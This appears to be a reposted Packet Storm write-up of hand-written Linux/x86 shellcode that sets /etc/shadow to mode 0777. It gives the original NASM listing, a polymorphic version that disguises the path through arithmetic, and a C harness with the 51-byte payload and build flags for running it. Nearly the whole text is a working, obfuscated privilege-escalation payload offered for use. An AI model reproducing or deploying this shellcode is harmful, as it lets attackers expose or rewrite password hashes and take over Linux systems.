Chmod 0777 Polymorphic Shellcode

This is my first hand-written shellcode for Linux, which I wrote for fun and exploration. I am a bit new to shellcoding in *nix environments. This shellcode changes the permissions of the shadow file on a Linux/x86 system to 0777. According to the Linux programmer's manual, chmod takes two arguments.

#include <sys/stat.h>

int chmod(const char *path, mode_t mode);

The char pointer path needs to be the path to the file, and the mode is the file permissions, which we calculate by ORing the permission bits together. Since we need to set it to 0777 (an octal value), the hexadecimal value is 0x1FF. This is my original assembly code. According to the x86 syscall table, the value for chmod is 15.

section .text
        global _start

;-----------------------------------------------------------------------
; chmod("//etc/shadow", 0777) through the Linux x86 int 0x80 interface.
; Syntax: NASM, 32-bit.
; In:    nothing
; Out:   eax = syscall return value
; Clobb: eax, ebx, cx, esp, flags
; Stack: 16 bytes of path string pushed and left in place
;-----------------------------------------------------------------------
_start:
        xor eax,eax                     ; eax = 0 (reused as the string terminator)
        push dword eax                  ; NUL terminator for the path
        push dword 0x776f6461           ; "adow"
        push dword 0x68732f63           ; "c/sh"
        push dword 0x74652f2f           ; "//et"  -> esp points at "//etc/shadow\0"
        mov ebx, esp                    ; ebx = path (arg 1)
        push word  0x1ff                ; mode 0777 == 0x1ff
        pop cx                          ; cx = 0x1ff; bits 16-31 of ecx keep their prior value
        mov al,0xf                      ; eax = 15 = __NR_chmod on x86
        int 0x80

This is my polymorphic version, in which I have changed the original code while retaining its functionality.

; Title:    chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date:     2014-06-22
; Author:   Osanda Malith Jayathissa (@OsandaMalith)

section .text
        global _start

;-----------------------------------------------------------------------
; Same chmod("/etc//shadow", 0777) call as the original listing, with the
; "adow" dword computed in two steps and the path stored below esp rather
; than pushed.
; Syntax: NASM, 32-bit.
; In:    eax = any value (the first two instructions reduce it to 0)
; Out:   eax = syscall return value
; Clobb: eax, ebx, cx, esi, esp, flags
; Stack: 16 bytes of path string left in place
;-----------------------------------------------------------------------
_start:
        mov ebx, eax                    ; ebx = eax, so the xor below yields 0 whatever eax held
        xor eax, ebx                    ; eax = 0
        push dword eax                  ; NUL terminator for the path
        mov esi, 0x563a1f3e             ; 0x563a1f3e + 0x21354523 = 0x776f6461 ("adow")
        add esi, 0x21354523
        mov dword [esp-4], esi          ; "adow"   -- these three stores write beneath esp;
        mov dword [esp-8], 0x68732f2f   ; "//sh"      the space is only claimed by the sub below
        mov dword [esp-12], 0x6374652f  ; "/etc"
        sub esp, 12                     ; esp points at "/etc//shadow\0"
        mov    ebx,esp                  ; ebx = path (arg 1)
        push word  0x1ff                ; mode 0777 == 0x1ff
        pop    cx                       ; cx = 0x1ff; bits 16-31 of ecx keep their prior value
        mov    al,0xf                   ; eax = 15 = __NR_chmod on x86
        int    0x80

 

This is the C skeleton file in which you can test it. Compile with the -fno-stack-protector and -z execstack arguments to gcc to make it execute.

/*
; Title:    chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date:     2014-06-22
; Author:   Osanda Malith Jayathissa (@OsandaMalith)

section .text
  global _start

_start:  
  mov ebx, eax
  xor eax, ebx
  push dword eax
  mov esi, 0x563a1f3e
  add esi, 0x21354523
  mov dword [esp-4], esi
  mov dword [esp-8], 0x68732f2f
  mov dword [esp-12], 0x6374652f
  sub esp, 12
  mov    ebx,esp
  push word  0x1ff
  pop    cx
  mov    al,0xf
  int    0x80

*/

#include <stdio.h>
#include <string.h>

/* Machine code of the polymorphic listing above (51 bytes, matching the
 * "Title" header). strlen() in main() reports the full length only because
 * none of these bytes is 0x00. */
unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";

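/* Test harness: print the payload length, then transfer control to code[].
 * code[] is a global array in a data section, so the call only succeeds when
 * the binary is built with the executable mapping the page describes
 * (-z execstack); otherwise it faults at the first instruction. */
int
main(void) {

        /* strlen() returns size_t, so the matching conversion is %zu, not %d. */
        printf("Shellcode Length:  %zu\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();

        return 0;
}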

http://packetstormsecurity.com/files/127180/Linux-x86-chmod-0777-etc-shadow-Polymorphic-Shellcode.html
